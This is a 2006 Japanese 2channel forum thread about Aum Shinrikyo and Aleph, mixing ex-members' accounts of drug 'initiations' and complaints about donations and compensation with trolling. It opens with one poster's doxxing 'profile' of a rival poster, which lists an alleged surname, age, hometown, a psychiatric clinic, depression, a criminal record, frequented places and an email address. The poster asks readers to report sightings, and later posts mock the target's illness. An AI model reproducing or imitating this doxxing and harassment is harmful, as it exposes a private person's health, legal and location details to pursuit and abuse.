以下、このスレを荒らしている「無印:阿佐谷北(偽者)」のプロフです。
この電波男はわたくし「阿佐谷北(本物) ◆Kcjlum1seI 」とは別人ですので、くれぐれもお間違えなきようお願い致します。
-------------------------------------------------------------------
HN】 阿佐谷北 asagayakita 阿佐ヶ谷北 京王線沿線住民
【本名】苗字は「石田」(オウム板では頻出) 名前は「むね○」らしい (ハレークリシュナ板より)
【年齢】昭和三十年代生まれ(自白) 現在42-51歳 
    千葉市の検見川・稲毛周辺に実家あり
【容姿】頭髪薄く貧相、顔に生気なし ヒザの抜けた薄汚れたズボンを愛用
【経歴】無職(生活保護申請は却下) 前科あり(現在も警察に所在確認をされていると自白)
    元オウム在家信者 カルト宗教ハレークリシュナ元信者(完全追放された模様)
    鬱病患者(稲毛駅前の○塚クリニックに通っていたと自白)
    老人ホームでの僅かなボランティア歴を誇らしげに語る
【趣味】2ちゃんねる荒らし ジャズ喫茶・漫画喫茶通い カルト宗教通い
    オウム教義叩き オウム担当警察官・NHK職員の情報収集 ヤクザ映画鑑賞
【出没地】稲毛 中央線沿線の漫画喫茶(ゲラゲラ他)ジャズ喫茶(四谷いーぐる他)
     新宿署 京橋フィルムセンター ラピュタ阿佐ヶ谷  千歳烏山オウムマンション
【天敵】警察官・刑事 公務員(都庁職員・福祉課課長・図書館職員等) テレ朝職員 東大
    全共闘世代 キリスト教徒 騙り 刺青をした外国人 帰国子女 ビートルズ
    創価学会 フジサンケイグループ 


172 :阿佐谷北(本物) ◆Kcjlum1seI :2006/10/12(木) 07:09:13 ID:3F+U+9Wb
>>171続き
95年頃まで、オウム真理教に親の年金を貢いでいた無印(トリップ無し)の阿佐谷北(偽者、asagayakita)こと「石田」君。
鬱病を放置し主治医にも従わず、昭和30年代生まれで若くないので要観察です。
犯罪歴があるため警察や脱退したアーレフから監視されています。
うさ晴らしにネットカフェから2ちゃんねるに書き込みしています。
もしPCのHN欄にトリップ無しの「阿佐谷北」が残っていたら、きっと彼です。
見たら連絡ください。asagayakita@hotamail.com まで。

173 :阿佐谷北(本物) ◆Kcjlum1seI :2006/10/12(木) 07:11:06 ID:3F+U+9Wb
無印:阿佐谷北(偽者)は、鬱病だそうですね。
そんな可哀想な彼を、みんなで励ましてあげましょう。

無印:阿佐谷北(偽者)、がんばれ!

無印:阿佐谷北(偽者)、がんばれ!

無印:阿佐谷北(偽者)、がんばれ!

無印:阿佐谷北(偽者)、がんばれ!

無印:阿佐谷北(偽者)、がんばれ!

無印:阿佐谷北(偽者)、がんばれ!

無印:阿佐谷北(偽者)、がんばれ!

無印:阿佐谷北(偽者)、がんばれ!

174 :名無しさん@3周年:2006/10/12(木) 08:10:40 ID:OvONmMQ2
>>151

タント○ロカ聖準師と元信徒さんの
実録会話です

175 :名無しさん@3周年:2006/10/12(木) 08:33:36 ID:OvONmMQ2
スガ○ダ、タン○ラロカ・・・

M派はすぐれたサマナを集めているというよりは
もともと組織適応性に問題あったサマナを集めているかもしれんな(苦笑)

176 :名無しさん@3周年:2006/10/12(木) 09:33:48 ID:VYWdLH9X
http://makimo.to/2ch/etc_recruit/1068/1068536809.html
前科のある人、集合


1 名前: asagayakita 03/11/11 16:46

 就職先は見つかりますか?

他人の目もあるので、大変でしょうが、立ち直ってください。
何が、意見あればご自由にどうぞ。
節度さえ守っていただければ結構です。



177 :名無しさん@3周年:2006/10/12(木) 09:40:06 ID:VYWdLH9X
906 :阿佐谷北:2005/08/16(火) 20:06:31 ID:IKOkPU8f>>905
 じゃぁ、キミは関係者か?
無視したいのは分かるが何度も俺の書き込みを読んでおくことだな。
印刷して読むことを勧めるよ。

178 :名無しさん@3周年:2006/05/25(木) 20:54:43 ID:7otx3zQY
>>173
調布市の福祉課長さんも、縊死堕みたいなクソ野郎を相手にしなきゃなんないなんて、
まったく気の毒というもんだ。


阿佐谷北本人:2006/05/07(日) 18:49:36 ID:5qxpI7Hu
>>498

単に人手が足りないという事ならば、
業務を担当する職員を増やすなり、臨時雇用(アルバイト)をすれば済む話なんだよ。

 某所(市立図書館)で実際あったことだが、書庫整理をボラにやらせていたケースがあった。
其処の職員に言わせれば、書庫整理をやらせてやっている、奉仕させてやっているのだと言う。
おかしいね。笑

 本を借りに来る人たちにとっては、書庫が整理されているというのは当たり前のことなんだよ。
 書庫整理は図書館職員の仕事であり、義務なんだけどな。笑

つまり、
人を雇えば、自分たちのボーナスに響いてしまうと言うことじゃないのかね。



178 :名無しさん@3周年:2006/10/12(木) 09:44:03 ID:VYWdLH9X
135 名前:名無しさん@ピンキー[sage] 投稿日:2006/05/14(日) 11:15:08 ID:uFnHv81W0
新規カテゴリー

 阿佐谷北本人捜索 のカテゴリー
を作ってもらえないだろうか?


子供のころから、住まいを転々とし、オウムに入信した上、警察 にも追われているので、

社会から(居ないこと)にされている 阿佐谷北本人 がいる。

いまでは、インターネット の発達により、 草加信者 や刺青をしたキリスト教徒 に追われる彼に、
ネット上や調布市の図書館で出会う可能性、非常に高いと思うのですが、

阿佐谷北本人 が、警察官に自宅訪問や、所在確認の電話をされない、上手い方法が見つからずにいます。
このところ、阿佐谷北本人 が、この 掲示板 の荒らしの仕方を学んで
いくつか、投稿しておりますので、この機会に。

検討、願えませんか。
過去に検討されたのでしたら、事情通 の方に、少々お話を聞きたいのですが.....

>>>じかにメールで、でも結構ですので。
追伸:ジャズの好きな刑事さん、連絡待ちます。
   asagayakita@hotmail.com


179 :名無しさん@3周年:2006/10/12(木) 10:49:28 ID:xUU+FtAL
\

180 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/12(木) 10:52:45 ID:1QTbK4Ru
>>170

第四禅からは禅定の完成形に入ります。
諸所の条件に左右されなくなる。これって南伝大蔵経にも書かれてた記憶が。

181 :名無しさん@3周年:2006/10/12(木) 12:07:43 ID:9NM1KQgB
◆ 何のためなのか良くわからなかったが、どうやら、地元素の浄化と言うことら
しい。初めの内は一日にどんぶりに半分の量だったが、日に日にその量は増して
行き、ついにはどんぶりに2〜3倍の量にまでなった。
◆  男性でもその量を一日で消費するのは結構キツイ。
しかも、男も女も関係なく毎日配られるのだ。そして、このアーモンド、
なんとずベてが「生」。無理に食べようとすれば、必ずお腹が「ピー」となる。
でも、決して捨てることは許されない。何故ならこれは「イニシエーション」
とされているからだ。当然、どんどん余って、ほとんどの女性がダンボールに
この余ったアーモンド入れて山積みにしていた。

◆  後で聞いた話だか、どうやら事の真相は社長の娘三女アーチャリーが
「アーモンドが好きだ」と言うことで買い過ぎたらしい。 
余りのアホらしさに言葉が出ない。


10年経って、アーモンド → 高級マンション
あああ、、


182 :名無しさん@3周年:2006/10/12(木) 12:18:44 ID:9NM1KQgB
◆ そのころすでに出家していたわたしは御多分にもれず、日本ではご法度の
ズバリLSDを使った「キリストのイニシェーション」を受けました。
(もっとも当時はそれがLSDだと知るすべもありませんでしたが。)

◆ 狭い部屋の中、以前受けた人が失禁でもしたのか、やけに臭くジメジメして
いて、「はあ〜っ、これが終わったら2,3度洗濯しなくっちゃ!!」なんて
思ったものでした。中盤あたりでしたか、他の部屋にいた人達、これがまた
凄いのです。部屋中を大暴れしているような音とか、猛獣の大合唱のように
みんな大声をあげて・・・、とにかく凄まじかったのです。強烈な薬物
飲まされてるのに、あまりの大騒ぎにわたしの意識が何回も戻るくらい、
とにかくおお暴れしていました。



183 :糞麻原へ捧げる昼便:2006/10/12(木) 12:21:58 ID:JZXjK2KR
                   人
                  ノ⌒ 丿
                _/   ::(
               /     :::::::\
               (     :::::::;;;;;;;)
               \_―― ̄ ̄::::ヽ
              ノ ̄     :::::::::::::: :::ヾ,
             (         ::::::::::::::;;;;
            / ̄――――― ̄ ̄::::::::\
           (          ::::::::::::::::::::::::::::::i
           人__......::::::::::::::::::::;;;;;;;;;;;;;;;;;;;;;;;;ノ_
         /                ,,,,;;::''''' ::::\
         (         ,,,,;;:::::::::::::::       __ ::;;i
        入        "   __ ::::  '"ゞ'-'_;;;ノ,,,,,
       /"':;;`丶___ __...,,,;:- '"-ゞ'-' ::::::..  ..............::::::::::ヽ、
      /      ''':::;;::::''''''        .....:::::::::::::::::::::::::::::::::::::l
      {;;                    ( ,-、 ,:‐、 ..::::::::::::,,,,ソ`ヽ
      i;;..           ,,,,,:::::::: '''''''           ''''''  ..;;;:l
    r´\_;;:..._,,、-‐―‐''゙゙゙        __,-'ニニニヽ    :::::::: /
    /                       ヾニ二ン"  ...::::::::::::/
    |                             ........,::::::-''゙゙
    丶、:::::::.........          _____   _______,,,-‐'''''゙゙゙
      `ー-、__ ,,,::::;;;;_,,,、-‐''''゙゙゙゙      ゙゙゙゙゙`


184 :糞麻原へ捧げる昼便:2006/10/12(木) 12:24:02 ID:JZXjK2KR
                   人
                  ノ⌒ 丿
                _/   ::(
               /     :::::::\
               (     :::::::;;;;;;;)
               \_―― ̄ ̄::::ヽ
              ノ ̄     :::::::::::::: :::ヾ,
             (         ::::::::::::::;;;;
            / ̄――――― ̄ ̄::::::::\
           (          ::::::::::::::::::::::::::::::i
           人__......::::::::::::::::::::;;;;;;;;;;;;;;;;;;;;;;;;ノ_
         /                ,,,,;;::''''' ::::\
         (         ,,,,;;:::::::::::::::       __ ::;;i
        入        "   __ ::::  '"ゞ'-'_;;;ノ,,,,,
       /"':;;`丶___ __...,,,;:- '"-ゞ'-' ::::::..  ..............::::::::::ヽ、
      /      ''':::;;::::''''''        .....:::::::::::::::::::::::::::::::::::::l
      {;;                    ( ,-、 ,:‐、 ..::::::::::::,,,,ソ`ヽ
      i;;..           ,,,,,:::::::: '''''''           ''''''  ..;;;:l
    r´\_;;:..._,,、-‐―‐''゙゙゙        __,-'ニニニヽ    :::::::: /
    /                       ヾニ二ン"  ...::::::::::::/
    |                             ........,::::::-''゙゙
    丶、:::::::.........          _____   _______,,,-‐'''''゙゙゙
      `ー-、__ ,,,::::;;;;_,,,、-‐''''゙゙゙゙      ゙゙゙゙゙`


185 :名無しさん@3周年:2006/10/12(木) 12:28:14 ID:9NM1KQgB
            〃´⌒ヽ
.     , -――  メ/_´⌒ヽ
   /   / ̄  ´ヽ ヽ
.  /  ,  /// ト. !  、 丶ヽ
  l  / /(((リ从  リノ)) '
  |  i  l (●) ,ヽノ(●)V l   ソンシ、供養させてください・・・
  l ,=!  l  ///ノ(、_, )ヽ///l l
  l ヾ! ', l    ヽ_フ   l l
  |  ヽヽヽ    ニ   //
  l    ヾ≧ , __ , イ〃
  li   (´`)l {ニ0ニ}、 |_"____
  li   /l, l└ タl」/l´        `l
  リヽ/ l l__ ./  |_________|
   ,/  L__[]っ /      /

186 :名無しさん@3周年:2006/10/12(木) 12:29:01 ID:9NM1KQgB
              )
             (
         ,,        )      )
         ゙ミ;;;;;,_           (
          ミ;;;;;;;;、;:..,,.,,,,,
          i;i;i;i; '',',;^′..ヽ
          ゙ゞy、、;:..、)  }
           .¨.、,_,,、_,,r_,ノ′
         /;:;":;.:;";i; '',',;;;_~;;;′.ヽ
        ゙{y、、;:...:,:.:.、;:..:,:.:. ._  、}
        ".¨ー=v ''‐ .:v、,,、_,r_,ノ′
       /;i;i; '',',;;;_~⌒¨;;;;;;;;ヾ.ミ゙´゙^′..ヽ 
       ゙{y、、;:...:,:.:.、;、;:.:,:.:. ._  .、)  、}
       ".¨ー=v ''‐ .:v、冫_._ .、,_,,、_,,r_,ノ′
      /i;i; '',',;;;_~υ⌒¨;;;;;;;;ヾ.ミ゙´゙^′.ソ.ヽ
 これで、1カルパ便通には困らない

187 :名無しさん@3周年:2006/10/12(木) 13:39:50 ID:VldrZKE/
>>165
シヴァナンダさんのいうサマディとは、
簡潔に定義するとどういうものになるのですか?
サマディといっても、
人によって、その定義がずれているようですが…。

188 :名無しさん@3周年:2006/10/12(木) 13:52:51 ID:9NM1KQgB
タントラロカって、ほんと頭カチカチだよな
生きていて、何かおもしろいことがあったことがあるんだろうかと
思ってしまうよ
カチカチであることに、喜びを見出しているとしか思えん


189 :名無しさん@3周年:2006/10/12(木) 14:01:52 ID:PpntJIqN
 
オウムの教義は思考をガチガチにするし、心もガチガチになってしまうと思う。

190 :名無しさん@3周年:2006/10/12(木) 14:30:16 ID:z8ZWKLS3
シヴァナンダにはマーラが憑いている。
だから尻にマラをつっこまれたwwww

191 :名無しさん@3周年:2006/10/12(木) 15:00:55 ID:rp/4KI03
オウムをバカにすると信者は我慢できなくなって書き込みする。
宗教ビジネスとはプライドを満たすこと。
プライドが唯一のエサであり、生きる動力。
プライドを取り去ると信者には何一つ残らないし 死んでしまう。

192 :名無しさん@3周年:2006/10/12(木) 15:10:32 ID:aSJacir+
                  _, ._
                 ( ・ω・) >>190
                 ○={=}〇,
                  |:::::::::\, ', ´
     ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,し,,,,`(.@)wwwwwwwwww

193 :名無しさん@3周年:2006/10/12(木) 16:18:04 ID:gETWMS6R
まじで最近、安奈さんみなくね?
ポアされたのかね

194 :名無しさん@3周年:2006/10/12(木) 17:00:32 ID:7hf8zJss
まさか

195 :知ったか丑:2006/10/12(木) 17:00:37 ID:LF5BFmh0
>>193
タントラディーラーに限って、匿名、もしくは、HNを変えてでも
書き込みしてるから気にせんでよろし。

ネット依存症とか、ネット中毒どころか、ネットで犯罪まで犯してるくせに
平然と何食わぬ顔で、成りすましに明け暮れるほどの重症だって事を
お忘れなく!!

196 :名無しさん@3周年:2006/10/12(木) 17:21:42 ID:51ZYqjDa
>>135
救済のために金が必要だと言って布施させたんだぜ
オウムはその金をこともあろうに犯罪に使いやがった
これは信徒に対する背任行為だぜ
布施をした時点では納得していたとしても、救済に使うとウソをついていた
これは詐欺だぜ
今でも納得してるのは現役信徒だけW
被害者賠償終わったら元信徒に金返してもらいたいね
その前に謝罪したらどうだ?金がなくても頭くらい下げられるだろ



197 :名無しさん@3周年:2006/10/12(木) 17:27:57 ID:aLTpmk1A
このイニシエーションを受けたら成就するっていって成就しなかったんだから
その金は返さないかんだろ。
当然だぞ。

198 :名無しさん@3周年:2006/10/12(木) 17:31:50 ID:QTz+ROnu
頭下げなくていいから金返せ!
頭下げれなくても、金くらい返せるだろ

199 :名無しさん@3周年:2006/10/12(木) 17:39:43 ID:Iu55nI0G
まったく、馬鹿が正面から突っ込みやがって、
喜ばないために喜ばないようにしてどうすんだ?
苦しいだけだろ。むしろ喜ばないことを喜んでいる。
損害賠償については心がこもってないのにしても意味ない。

200 :名無しさん@3周年:2006/10/12(木) 17:44:58 ID:hbxCt8IC
心なくてもいいから銭返せ!

世の中じぇに!

201 :名無しさん@3周年:2006/10/12(木) 17:46:14 ID:zDZD+x2p
サマナよ、アーレフに居たいなら働け。

202 :名無しさん@3周年:2006/10/12(木) 17:58:09 ID:alGj9dvQ
>>201
教団には現世で働く気力も体力もない人が多い。
仏教やヨーガの修行によって超人を養成するために作られた教団は
今や「もやし栽培場」になってしまった。
嘆かわしや。

203 :名無しさん@3周年:2006/10/12(木) 17:58:59 ID:Iu55nI0G
はぁ、払う方もそうゆうわ。

世の中 銭ってな

204 :名無しさん@3周年:2006/10/12(木) 18:07:51 ID:qzpwERTd
>>199
ワケワカメ

>損害賠償については心がこもってないのにしても意味ない。

んなこたーない

205 :名無しさん@3周年:2006/10/12(木) 18:08:36 ID:O5tUTjLt
>>202
上のひとは指導したり責任もったりしないの?

206 :名無しさん@3周年:2006/10/12(木) 18:10:29 ID:uOWA16ID
損害賠償は心の現われの一つ。
早くしろ。

207 :三女あちゃり:2006/10/12(木) 18:10:43 ID:alGj9dvQ
          ,, '||||||||| ||||||||||||||l
         /|||||||||| l||||||||||||||||||||l
         ||||||||||__ |||||||||||||||||||l  
        ||||||||| .-=;    =-. ||||
       r'||(^|||  ,,ノ r 。 。) 、  |||l ̄ヽ
      / ||||`|l U  ,. =三ァ ,.  .||!   \  
     /   ,ノ||||||、._   ー- '  _.,ノリト  V  ヽ、
  「) /     Yノ||l|||||l ` ー-‐  ィl|||リト    Y    \ _
  >う⌒rー、 /                        __,{h
. └-「)「}「〉}|                  }r‐'⌒ ('く
   丁´´ /\__    -‐ = ‐-       ,イ「)「}_,「|丿
    `'ー'7                  ̄ハ`┴
>>203 はぁ、払う方もそうゆうわ。世の中 銭ってな

素晴らしい!「世の中 銭!」こそ絶対的真理です!
原理主義派のみなさん、しっかり銭稼いでわたしに貢いでね、うふ♡

208 :名無しさん@3周年:2006/10/12(木) 18:24:09 ID:alGj9dvQ
>>205
上の者は智慧・慈悲がなく、下の者はわがままで甘えん坊です。
上も下もすっかり堕落してしまいました。

この教団の実体に幻滅したのが、わたしが教団を離れた
大きな理由の一つです。

自分達を救済できない者が他を救済できるはずがありません。
教団は本当に末期症状です。

四女が家族とも教団とも決別したという報道を聞いて
「彼女もそう思ったんだろうな」としみじみ思いました。

209 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/12(木) 18:34:47 ID:1QTbK4Ru
>>187

それをここで書くとかなり長いし、大変なのでカンベンしてください。
ただ、一言。それは常に「起こるもの」実はその前段階のディアーナも常に「起こるもの」
です。だからサマディは準備ができていないと「起こらない」
それにまだサマディに入ってないので正確には伝えられないと思います。
ただ、かなりサマディが起こるのに近い状態になってきつつあるのでそのうち詳細をお知らせできるかも
しれません。


210 :名無しさん@3周年:2006/10/12(木) 18:38:04 ID:2G15Vu0r

頭の弱そうな医者もよく見かけますが、四女だけにはそうなってもらいたくないものです。


211 :名無しさん@3周年:2006/10/12(木) 18:43:50 ID:zzMi7RtN
                  _, ._
                 ( ・ω・) >>210
                 ○={=}〇,
                  |:::::::::\, ', ´
     ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,し,,,,`(.@)wwwwwwwwww

212 :名無しさん@3周年:2006/10/12(木) 18:44:30 ID:Iu55nI0G
上のものはさらに上のものに甘えん坊。


んなこた−あるよ

213 :名無しさん@3周年:2006/10/12(木) 18:55:38 ID:aSJacir+
おれも起訴はされていないがサリン事件の後、ビラ配りやなんかで2回ほど捕まった
な。起訴されない場合は前科にならないんだろ?どうなの?まともな会社にはもう
入れないから別にいいんだけどさ。オウムに入らなかったら人生とかどう生きるか
なんてこんなに真面目に考えなかっただろうな。選ばなかった選択肢は無かったのと
同じだとはおもうけど。オウムに入らなかった人生ってどんなんだろうな?と時々
考えてしまうな。

214 :名無しさん@3周年:2006/10/12(木) 19:08:29 ID:OHhCwQj+
M派に、自分は責任があるから教団に残るという人がいる。
確かに、教団が解散したら、賠償金を払う人がいなくなる。
「教団に金を返せ」と文句を言っている人とは、
思考の次元が違う。
考え方に責任感があって高貴だ。

教団が間違っていると思うのならば、
そのことに気づかずに、
そこに布施をした信徒にも、
責任があると考えるべきである。

いわゆる左道タントラや、ヴァジラヤーナの路線は、
密かに実行されていたというよりも、
堂々と、むしろ有言実行であったといえる。

215 :名無しさん@3周年:2006/10/12(木) 19:09:36 ID:O5tUTjLt
>>208

レスありがとうございます。
大事件を抱えてまで上絶対でやってきた体質からいえば
上の責任がまだかなり大きいようにおもうのですが
完全に責任とって指導するか民主主義にするか決めないと
状況がわからずエネルギーも安定しない下ほど路頭に迷うのでは?
それぞれ救世主をまちわびて現状維持ということでしょうか。
現実的に責任をとっていこうというひとがどうしていないのですか。


216 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/12(木) 19:21:39 ID:1QTbK4Ru
>>214
>M派に、自分は責任があるから教団に残るという人がいる。確かに、教団が解散したら、賠償金を払う人がいなくなる。
「教団に金を返せ」と文句を言っている人とは、思考の次元が違う。考え方に責任感があって高貴だ。

ん?
責任取るって普通のことじゃない?
どこも次元は違わないし、高貴でもなんでもない。普通。ごく普通。


>教団が間違っていると思うのならば、そのことに気づかずに、そこに布施をした信徒にも、
責任があると考えるべきである。

責任転嫁。騙した方が絶対に悪い。
押しピンを撒いたヤツがいて、その押しピンを踏んだら「踏んだヤツが悪い」と
言ってるようなもの。
幹部は一般サマナや一般信徒に比べて情報を得やすかったのだから、責任がある。
これはM派だろうがA派だろうが同じ。

>いわゆる左道タントラや、ヴァジラヤーナの路線は、密かに実行されていたというよりも、
堂々と、むしろ有言実行であったといえる。

殺人は隠していたし、サリンだってLSDだって隠れて作っていた。
堂々とと言うなら「うちは大量殺戮用のサリンをタントラヴァジラヤーナの
実践用に作ってますw」って情報開示してたはず。


217 :名無しさん@3周年:2006/10/12(木) 19:23:27 ID:aSJacir+
昨日変な夢見たな。壁のようなところに自分に対する戒めみたいな文章が書かれていて、
内容はちょっと忘れてしまったが結局全てはお前は自己中が原因だ!みたいな結論だった
目が覚めて妙に納得してしまったな。

218 :名無しさん@3周年:2006/10/12(木) 19:34:44 ID:idSABKq8
>>214
レベルの低い話だね。

賠償金の為の布施と、騙して受けさせらたイニシエイションの金を返せというのは全然違うの。
それに賠償金の為と思って布施したお金でも、何に使われてるかわからないの。
アホらしい。

219 :名無しさん@3周年:2006/10/12(木) 19:38:16 ID:KiErTx9b
フジ系で

奇跡体験!アンビリバボー前世スペシャル ”前世”スペシャル!!衝撃報告!!前世療法が解き明かす運命の絆!!
▽220年前の大洪水で人柱に…女が語る前世未知の史実と次々一致
▽前世透視超能力10歳ほか

やってるよ。

220 :名無しさん@3周年:2006/10/12(木) 19:42:34 ID:aSJacir+
前世は阿修羅の王だった。というのはうそ?

221 :名無しさん@3周年:2006/10/12(木) 19:53:56 ID:51ZYqjDa
左道タントラ(セックスしたかっただけ)やってるなんて
末端のサマナも知らなかったと思う
麻原に息子ができたとき、尊師はアストラルから子供を引っ張ってきた
というサマナがいた 
キリストの処女懐胎さながらの御伽話を信じてるサマナがいたんだぜ
麻原がセックスすると思ってない、思いたくないんだろうね


222 :名無しさん@3周年:2006/10/12(木) 19:58:39 ID:X6HeMDex
>>217
大事な夢だね。
殆どの魂にとっての最大級のメインテーマだ。

223 :名無しさん@3周年:2006/10/12(木) 20:25:27 ID:gETWMS6R
214
いい加減にしてくれない?
教団がタントラしているって、有限実行だっていうけど
初期の本では、タントラは批判があって現代日本にそぐわないから
やらないと、言っていたわよ

ただでさえ、騙されて金取られたのに
まだ賠償のために金を出せ、っていうの?
二重に取ってどうするのよ?
第一、サマナだって働きにでないやつもいるそうじゃない?
わざわざ私を怒らせようとしているの?
本当に、事件は知らなかったのよ
信者の金使って、散々迷惑かけたくせに さらに賠償のために
働けっていうの?
あんたが払えばいいじゃないの
しかも、アチャリは使い込むし


224 :名無しさん@3周年:2006/10/12(木) 20:28:03 ID:gETWMS6R
私は、受付で万札きって、布施するときに聞いたのよ
(この布施を、何に使うのですか)って
したら、男性の師(ポーシャだったと思う)が
(一度自分の手を離れた布施は、もう自分のものではないのですよ)と

つまり、使い道を知りたがった私を、迷惑がったわけ
で、もし、(殺人に使うのですよ)とか言ったなら、私は出さなかったわよ
でも、布施の使い道は教団が決めるといったのだから
責任は教団にあるわね?


225 :名無しさん@3周年:2006/10/12(木) 20:31:49 ID:gETWMS6R
>いわゆる左道タントラや、ヴァジラヤーナの路線は、
密かに実行されていたというよりも、
堂々と、むしろ有言実行であったといえる。

私は、教組に妻以外の女がいたのは、事件後初めて知りましたけど?
在家のみなさんは、知っていました?
サマナは知っていたのかもしれない

あんたら、賠償金払うってのを理由に、くだらない団体存続しているようだけど
被害者の方も、そんなこと望んでいないそうじゃない?
解散してほしいというのが、一番の願いだそうで?

第一、二ノ宮とか、教団本体と違う場所で金ためているって噂あるけど
そういうの、どうして賠償にまわさないの?


226 :名無しさん@3周年:2006/10/12(木) 20:34:30 ID:gETWMS6R
>教団が間違っていると思うのならば、
そのことに気づかずに、
そこに布施をした信徒にも、
責任があると考えるべきである。

本当に、嫌な思いばかりさせられて、こんなひどいこと聞かされてたまらないわ
早く、つぶそうよこんな団体、、
早くつぶすために、私に何ができるだろう?


227 :名無しさん@3周年:2006/10/12(木) 20:36:59 ID:gETWMS6R
騙しておいて、気がつかないオマエが悪いっていうの?
もう散々だわ、、、
タントラは有限実行だなんて
だいたい、教祖に女がいることに、賛成の意を表している人っていたのかしら?

なんで人の嫌がることばかりするの
本当に人生返してほしい
人を馬鹿にしているんだよ
なんでも、やりたいことは、信者に隠れて裏ですればいいし
金は騙して取り上げればいいし、、
早く死刑にしてくれよ


228 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/12(木) 20:37:51 ID:1QTbK4Ru
>第一、二ノ宮とか、教団本体と違う場所で金ためているって噂あるけど
そういうの、どうして賠償にまわさないの?

現役サマナに聞いたよ。
噂じゃなくてほんとだって。

229 :名無しさん@3周年:2006/10/12(木) 20:40:24 ID:gETWMS6R
第一さ、賠償金の支払い義務さえ
(俺たちがいなけりゃ、あんたら、賠償金払ってもらえないんだぜ?)って
脅しの材料にしているみたいで、腹立たしいよな?

38億くらいだよね?
こうしたらどうかね、
国民みんなに聞くんだよ
残念だが、みんなで40円ずつ出し合えば、(だろ?計算弱くて)
賠償金が払えるから、国民で払うと
そのかわり、オウムは徹底的につぶす
二度と、どんな形でも立ち上がれないようにつぶす

これで、意見を求めて、国民が同意したら、つぶしたらいいよ

230 :名無しさん@3周年:2006/10/12(木) 20:42:21 ID:aSJacir+
第8サティアンの2階で半出家状態だった信徒さんが機械に胸を挟まれて死んだ
んだけど、ちょうど教祖と幹部は中国に行った所で、サマナが人工呼吸とかしたけど
ダメで救急車を呼んだから事件が外に漏れて、中国ツアーが急遽中止で慌てて
戻ってきた事があったな。別に殺したわけじゃないから問題ないとは思うんだけど
それまでに何人も殺してたから、現場検証とかどうなるのか不安があったのかな。
数日後に教祖が8サティの信徒さんが亡くなった現場に来て、死んだ信徒さんがここに
いるのが見えると言ってた。工場の機械を見て帰っていったな。

231 :名無しさん@3周年:2006/10/12(木) 20:48:03 ID:gETWMS6R
214
あんたってさ、詭弁ばかり吐くよね
嫌がらせするの好き?
教組自体が、嫌がらせ大好きみたいだしね

書くの三度目だけど、連続幼女殺害の宮崎勤だっけ?
彼の家が印刷業を営んでいたそうなの
それを新聞で見た教祖が、
(今宮崎の家に言って、買い叩けばタダみたいな値段で返るぞ)って
印刷機が欲しかったんだろうけど
、、、
そんで、本当に早川と岡崎で、宮崎の実家まで行ったんだって
あいにく、両親はホテル住まいにしていたそうだし、家のまわりに
捜査のために、ヒモをめぐらしてあったり、ものものしかったから
あきらめて帰ってきたそうだけど、、

わざわざ、世間を騒がしている人物の家にいって、買ってこいっていうのよ?
異常心理よねえ?


232 :名無しさん@3周年:2006/10/12(木) 20:53:28 ID:gETWMS6R
>第一さ、賠償金の支払い義務さえ
(俺たちがいなけりゃ、あんたら、賠償金払ってもらえないんだぜ?)って
脅しの材料にしているみたいで、腹立たしいよな?

何をしてもふてぶてしいよねえ
だって、一生働いても返せ無さそうだから、かえって、この先ずっと
賠償金の支払いを理由に、教団がつぶされなくてすむって、
安堵させてしまっているくらいで、、

しかも、支払いが遅いからといって、利息がかさむわけでもないし
のんびり、マンションなんか買って、そっちも借金だけど
おいおい返せばいいや、ってのんびり構えているよねえ?
信者には、借金強要してまで、イニ受けさせてさあ
、、
国も返せそうにないからって、なんで引き伸ばしとか同調してやる必要があるのよ?
民間で金融から借りて、返せないからって
ずるずる期間延ばしてくれる?
のばせば、利息つくのよ?
甘いわよねえ?



233 :名無しさん@3周年:2006/10/12(木) 20:57:37 ID:gETWMS6R
だって、信者には、民間の金融紹介してまで借りさせたのよ?
そんで、返せなくなったとしても、教団は責任なんか取るつもりなかったわよ?
私は元サの彼と二人で、借金したから二人分で260マンくらい借りたのよ?

教団って、返済引き延ばしても、利息取られたりしないんでしょう?
だから余計に、のんびりしているんじゃないの?
少し利息つけたらどうよ?
そうしたら、もっと必死に働くんじゃないの?
ある時払いの催促無しなわけ?


234 :名無しさん@3周年:2006/10/12(木) 21:03:19 ID:gETWMS6R
自分たちだって、信者から金取るときには、全く温情なかったじゃないの?
それも、あんな、何の役に立ったんだかわからないパーフェクトイニとか
寝転んでいたって誰でも解脱できますってすごい豪語して
勧めて、誰も成就者でないし
そういう商売平気でして、一体いくら儲けたんだろう?

すごい人数が受けたわよね?
そうやって、騙して受けさせて、騙された側にも責任があるなんて、
言い草だし、、
どういう見解の人なのかね?内部者だとは思うけど、、


235 :名無しさん@3周年:2006/10/12(木) 21:05:46 ID:gETWMS6R
漏れは、教団潰れてもゼンゼン構わないから
あんたたちが、私の人生が、どうなろうと、最後に解脱できればいいんだって
思って、姑息なことを私にしたのを忘れないわよ

カルマっていうじゃない?
泣き喚いて暮らせばいいのよ、

236 :阿佐谷北本人:2006/10/12(木) 21:10:16 ID:yV5A7J7g
>>216 幹部は一般サマナや一般信徒に比べて情報を得やすかったのだから、責任がある。
これはM派だろうがA派だろうが同じ。

(立場上)情報を得易かったとは、見方が甘すぎるよ。
起こした事件は、どれもかなりの準備が必要なものばかり。


 幹部は、当然、知っていたはずだよ。


 裁判を乗り切る為に用いた彼らの方便を、今も鵜呑みにしていい訳が
ないじゃんか?笑

237 :名無しさん@3周年:2006/10/12(木) 21:10:46 ID:gETWMS6R
http://page5.auctions.yahoo.co.jp/jp/auction/e61170999

あと30分!!ヴァジラヤナサッチャ

238 :名無しさん@3周年:2006/10/12(木) 21:12:16 ID:gETWMS6R
事件について知りたい人は読んでね
信者が痛くマインドコントロールされていたってのがわかる本だからさ

239 :名無しさん@3周年:2006/10/12(木) 21:13:54 ID:gETWMS6R
http://page5.auctions.yahoo.co.jp/jp/auction/e56908031

こんな顔で、女が20人もいたなんて、、

240 :阿佐谷北本人:2006/10/12(木) 21:14:18 ID:fQYx8d98
  教団内部の殺し合いを鑑みれば、教団システムが軌道に乗るまでは、イザコザを表沙汰にしたくなかったのだろう。
弁護士殺しについても、そう考察している向きが多い。
 宗教組織というものは、殺し合いや武装化にまで発展するケースが、
まま見られるものらしいよ。内部抗争が発展して、そうなる場合があるようだ。 

